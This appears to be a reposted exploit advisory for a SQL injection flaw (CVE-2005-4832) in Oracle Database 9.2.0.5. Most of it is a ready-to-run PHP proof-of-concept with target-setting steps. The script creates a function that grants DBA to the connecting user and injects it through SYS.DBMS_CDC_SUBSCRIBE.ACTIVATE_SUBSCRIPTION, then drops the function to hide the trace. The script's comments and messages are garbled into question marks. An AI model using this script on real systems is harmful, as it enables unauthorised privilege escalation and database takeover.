Oracle Database Server 9.2.0.5 SQL Injection

Latest Posts

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 112

Oracle Database Server 9.2.0.5 SQL Injection

=============================================================================================================================================
| # Title Oracle Database Server 9.2.0.5 SQL Injection

=============================================================================================================================================
| # Title : Oracle Database Server 9.2.0.5 SQL Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.oracle.com/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: SQL injection vulnerability in Oracle database SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION package.

(Related : https://packetstorm.news/files/id/180720/ Linked CVE numbers: CVE-2005-4832 ) .

[+] save code as poc.php.

[+] Set target : line 3 + 4 + 5 + 6 + 7

[+] PayLoad :

<?php
// ????? ??????? ?????? ?????? Oracle
$host = "localhost"; // ???????? ?????? ???????
$port = "1521"; // ???? Oracle
$sid = "ORCL"; // ???? ????? ????????
$user = "victim_user"; // ???????? ????????
$password = "victim_password"; // ???? ??????

try {
$dsn = "oci:dbname=$host:$port/$sid;charset=UTF8";
$conn = new PDO($dsn, $user, $password);
$conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

echo "[+] ??????? ?????? ???????? ????!\n";

// ??? ???? ???????
$func_name = "h4ck" . rand(1000, 9999);

// ????? ???? ???? ?????? ????? SQL ????????? ?????
$function = "
CREATE OR REPLACE FUNCTION $func_name RETURN VARCHAR2
AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO $user';
RETURN '';
END;
";

// ??????? ?????
$injection = "
BEGIN
sys.dbms_cdc_subscribe.activate_subscription('''||$func_name()||''');
END;
";

// ??? ?????? ??? ???????
$clean = "DROP FUNCTION $func_name";

echo "[+] ????? ?????? ??????...\n";
$conn->exec($function);

try {
echo "[+] ?????? ????? ??? SQL...\n";
$conn->exec($injection);
} catch (Exception $e) {
echo "[-] ??? ????? ?????: " . $e->getMessage() . "\n";
} finally {
echo "[+] ????? ??????...\n";
$conn->exec($clean);
}

echo "[+] ????? ???????.\n";
} catch (PDOException $e) {
die("[-] ??? ?? ???????: " . $e->getMessage() . "\n");
}
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Social Media Share

Get Rid of Ads!

Latest Posts

Oracle Database Server 9.2.0.5 SQL Injection